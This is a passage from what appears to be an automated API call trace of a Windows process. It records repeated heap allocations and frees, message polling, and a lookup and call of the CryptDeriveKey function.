(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0247.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.847] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0247.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.848] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.849] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0247.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0247.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0247.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ac0 [0247.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ac0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0247.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0247.852] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.899] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0247.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0247.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0247.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0247.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0247.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0247.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0247.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0247.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0247.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0247.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0247.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0247.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0247.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 